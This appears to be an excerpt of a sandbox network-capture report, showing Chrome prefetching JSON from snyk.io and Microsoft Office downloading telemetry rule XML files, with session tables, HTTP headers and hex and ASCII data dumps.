                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC1057INData Raw: 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 75 72 6c 22 3a 22 2f 69 6e 74 65 67 72 61 74 69 6f 6e 73 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 65 63 6c 69 70 73 65 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 49 45 53 35 44 52 4f 34 52 44 4e 49 69 35 6c 45 5a 66 69 6e 78 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 43 6f 64 65 20 43 68 65 63 6b 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 75 72 6c 22 3a 22 2f 63 6f 64 65 2d 63 68 65 63 6b 65 72 2f 22 2c 22 61 70 70 65 61 72 61 6e 63
                                                                                                                                                                                                                                                                                                              Data Ascii: description":null,"url":"/integrations/","appearance":{"navItem":{"icon":"eclipse"}}},{"sys":{"id":"IES5DRO4RDNIi5lEZfinx","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Code Checker","description":null,"url":"/code-checker/","appearanc
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 4c 65 61 64 65 72 73 20 68 61 6e 64 62 6f 6f 6b 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 75 72 6c 22 3a 22 2f 6c 70 2f 73 65 63 75 72 69 6e 67 2d 61 69 2d 67 65 6e 65 72 61 74 65 64 2d 63 6f 64 65 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 68 61 6e 64 62 6f 6f 6b 22 7d 7d 7d 5d 7d 7d 5d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 34 72 4e 5a 30 50 55 49 78 49 30 47 4e 63 6c 41 61 30 69 58 42 69 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000"__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Leaders handbook","description":null,"url":"/lp/securing-ai-generated-code/","appearance":{"navItem":{"icon":"handbook"}}}]}}]}},{"sys":{"id":"4rNZ0PUIxI0GNclAa0iXBi","__typename"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC12INData Raw: 6f 72 6d 22 2c 22 75 72 6c 22 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: orm","url"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC3731INData Raw: 30 30 30 30 30 45 38 37 0d 0a 3a 22 2f 70 6c 61 74 66 6f 72 6d 2f 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 34 65 41 6b 48 59 36 51 7a 56 50 5a 66 35 66 50 30 6c 32 35 4e 6f 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 50 72 69 63 69 6e 67 22 2c 22 75 72 6c 22 3a 22 2f 70 6c 61 6e 73 2f 22 7d 5d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 34 4d 77 68 31 33 42 57 50 73 35 6f 4e 76 51 62 75 4f 41 72 69 30 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 46 6f 6f 74 65 72 43 61 74 65 67 6f 72 79 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000E87:"/platform/"},{"sys":{"id":"4eAkHY6QzVPZf5fP0l25No","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Pricing","url":"/plans/"}]}},{"sys":{"id":"4Mwh13BWPs5oNvQbuOAri0","__typename":"Sys"},"__typename":"NavigationFooterCategory"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              62192.168.2.54981023.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:07 UTC612OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/plans.json?slug=plans HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"v73oqi948j2hg7"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/plans.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::tvkvz-1729799348005-9a43deaf8a99
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:08 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799347.1f60d73
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC15767INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 33 62 30 31 6f 63 35 78 4b 64 4a 48 72 6e 77 64 33 4f 33 62 4d 6e 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 31 32 2d 30 37 54 31 31 3a 31 33 3a 34 31 2e 31 39 36 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 35 2d 30 31 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3b01oc5xKdJHrnwd3O3bMn","type":"Entry","createdAt":"2023-12-07T11:13:41.196Z","updatedAt":"2024-05-01T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC16008INData Raw: 32 35 3a 34 32 2e 38 38 35 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 39 2c 22 72 65 76 69 73 69 6f 6e 22 3a 33 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 63 6f 6e 74 65 6e 74 54 65 78 74 53 69 6e 67 6c 65 4c 69 6e 65 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 74 65 78 74 22 3a 22 50 72 6f 64
                                                                                                                                                                                                                                                                                                              Data Ascii: 25:42.885Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":9,"revision":3,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"contentTextSingleLine"}},"locale":"en-US"},"fields":{"text":"Prod
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC16384INData Raw: 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 36 38 2c 22 72 65 76 69 73 69 6f 6e 22 3a 32 34 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 61 74 6f 6d 42 75 74 74 6f 6e 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61 6c 4e 61 6d 65 22 3a 22 5c 22 42 75 79 20 6e 6f 77 5c 22 20 2d 20 54 65 72 74 69 61 72 79 22 2c 22 6c 61 62 65 6c 22 3a 22 42 75 79 20 6e 6f 77 22 2c 22 75 72 6c 22 3a 22 2f
                                                                                                                                                                                                                                                                                                              Data Ascii: r","type":"Link","linkType":"Environment"}},"publishedVersion":68,"revision":24,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"atomButton"}},"locale":"en-US"},"fields":{"internalName":"\"Buy now\" - Tertiary","label":"Buy now","url":"/
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC1005INData Raw: 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 6c 61 62 65 6c 22 3a 22 54 65 73 74 73 20 70 65 72 20 6d 6f 6e 74 68 22 2c 22 69 73 42 65 74 61 22 3a 66 61 6c 73 65 2c 22 63 65 6c 6c 4c 61 62 65 6c 46 72 65 65 22 3a 22 33 30 30 22 2c 22 63 65 6c 6c 4c 61 62 65 6c 54 65 61 6d 22 3a 22 47 65 74 20 61 20 63 75 73 74 6f 6d 20 71 75 6f 74 65 22 2c 22 63 65 6c 6c 4c 61 62 65 6c 54 65 61 6d 4c 69 6e 6b 22 3a 22 2f 73 63 68 65 64 75 6c 65 2d 61 2d 64 65 6d 6f 2f 22 2c 22 63 65 6c 6c 4c 61 62 65 6c 45 6e 74 65 72 70 72 69 73 65 22 3a 22 47 65 74 20 61 20 63 75 73 74 6f 6d 20 71 75 6f 74 65 22 2c 22 63 65 6c 6c 4c 61 62 65 6c 45 6e 74 65 72 70 72 69 73 65 4c 69 6e 6b 22 3a 22 2f 73 63 68 65 64 75 6c 65 2d 61 2d 64 65 6d
                                                                                                                                                                                                                                                                                                              Data Ascii: },"locale":"en-US"},"fields":{"label":"Tests per month","isBeta":false,"cellLabelFree":"300","cellLabelTeam":"Get a custom quote","cellLabelTeamLink":"/schedule-a-demo/","cellLabelEnterprise":"Get a custom quote","cellLabelEnterpriseLink":"/schedule-a-dem
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 74 22 3a 22 32 30 32 33 2d 31 32 2d 30 37 54 31 31 3a 31 33 3a 34 33 2e 36 37 30 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 31 36 54 30 33 3a 32 35 3a 34 35 2e 36 30 36 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 33 31 2c 22 72 65 76 69 73 69 6f 6e 22 3a 31 30 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000t":"2023-12-07T11:13:43.670Z","updatedAt":"2024-07-16T03:25:45.606Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":31,"revision":10,"contentType":{"sys":{"type":"Link","linkType":"ContentType","i
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC12INData Raw: 72 65 61 74 65 64 41 74 22 3a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: reatedAt":
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 22 32 30 32 33 2d 31 32 2d 30 37 54 31 31 3a 31 32 3a 34 35 2e 35 39 34 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 31 36 54 30 33 3a 32 35 3a 34 37 2e 30 36 34 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 33 33 2c 22 72 65 76 69 73 69 6f 6e 22 3a 31 31 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000"2023-12-07T11:12:45.594Z","updatedAt":"2024-07-16T03:25:47.064Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":33,"revision":11,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC12INData Raw: 61 74 65 64 41 74 22 3a 22 32 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: atedAt":"2
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC16384INData Raw: 30 30 30 30 38 34 46 30 0d 0a 30 32 34 2d 30 37 2d 31 36 54 30 33 3a 32 35 3a 34 38 2e 31 37 36 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 39 37 2c 22 72 65 76 69 73 69 6f 6e 22 3a 34 35 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 63 6f 6e 74 65 6e 74 46 61 71 49 74 65 6d 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65
                                                                                                                                                                                                                                                                                                              Data Ascii: 000084F0024-07-16T03:25:48.176Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":97,"revision":45,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"contentFaqItem"}},"locale":"en-US"},"fie
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 7b 22 69 63 6f 6e 22 3a 22 6c 6f 63 6b 2d 68 65 61 72 74 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 78 68 4e 59 42 32 45 65 57 4b 33 64 43 50 76 45 72 66 47 48 78 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 53 65 63 75 72 69 74 79 20 6c 65 61 64 65 72 73 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 75 72 6c 22 3a 22 2f 73 65 63 75 72 69 74 79 2d 6c 65 61 64 65 72 73 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 73 68 69 65 6c 64 2d 73 74 61 72 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22
                                                                                                                                                                                                                                                                                                              Data Ascii: {"icon":"lock-heart"}}},{"sys":{"id":"3xhNYB2EeWK3dCPvErfGHx","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Security leaders","description":null,"url":"/security-leaders/","appearance":{"navItem":{"icon":"shield-star"}}},{"sys":{"id":"


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              63192.168.2.54981513.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:08 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 2980
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 1a9c8bfd-301e-0000-1fee-25eecc000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194908Z-16849878b78gvgmlcfru6nuc54000000081000000000uba3
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              64192.168.2.54981713.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:08 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 408
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 626c88a9-b01e-003d-54f3-24d32c000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194908Z-15b8d89586fvpb597drk06r8fc00000000ng000000002bz6
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              65192.168.2.54981313.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:08 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 3788
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BAC2126A6"
